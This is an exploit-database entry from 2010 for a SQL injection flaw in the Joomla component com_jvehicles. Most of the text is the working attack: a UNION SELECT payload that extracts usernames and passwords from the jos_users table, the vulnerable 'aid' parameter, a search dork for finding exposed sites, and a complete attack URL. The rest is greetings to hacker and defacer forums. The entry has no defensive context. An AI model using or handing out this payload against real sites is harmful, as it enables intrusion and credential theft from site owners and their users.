Joomla Component com_jvehicles SQL injection Vulnerability

2010-04-15T00:00:00
ID 1337DAY-ID-11818
Type zdt
Reporter Sudden_death
Modified 2010-04-15T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ==========================================================
Joomla Component com_jvehicles SQL injection Vulnerability
==========================================================

# Exploit Title     : joomla component jvehicles SQL injection Vulnerability
# Date              : 15 april 2010
# Author            : Sudden_death ([email protected])
# Software Link     : N/A
# Tested on         : Windows XP 2
# Platform/Tested on: Windows XP 2 SP 2
# myweb             : http://suddendeath.000space.com/
# dork              : inurl:option=com_jvehicles
# Code                 : +and+1=2+union+select+1,2,group_concat(username,0x3a,password)suddendeath,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jos_users--
======================================================================
 
# EXPLOIT / c0de

+and+1=2+union+select+1,2,group_concat(username,0x3a,password)suddendeath,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jos_users--
 
 
# VULN IN HERE
 
http://localhost/joomla/index.php?option=com_jvehicles&task=agentlisting&aid=62[c0de}
 
 
 
# LIVE DEMO
 
http://localhost/joomla/index.php?option=com_jvehicles&task=agentlisting&aid=62+and+1=2+union+select+1,2,group_concat(username,0x3a,password)suddendeath,4,5,6,7,8,9,10,11,12+from+jos_users--
 
 
[#]-------------------------------------------------------------------
 
GREETZ TO WE FORUM:
[ indonesianhacker[dot]com | indonesiandefacer[dot]org ]
 
[#]-------------------------------------------------------------------
 
MY BROTHA :
| MISTERFRIBO | BobyPutrA | Syst3m_RtO | bumble_be | CS-31 | d43ngCyb3r | Ichito-Bandito | james0baster |
| kaMtiEz | Man In Black | otong | r3m1ck's | shadowsmaker | SyNTaX ErRoR | iJoo | FLYFF666 | LOL1ds |
| cah_surip | demnas | RXn7 | and all crew indonesia hacker :D |
 
[#]-------------------------------------------------------------------
 
note :jangan mengatakan setiap apa yang engkau ketahui tapi ketahuilah setiap apa yang kau katakan!



#  0day.today [2018-03-05]  #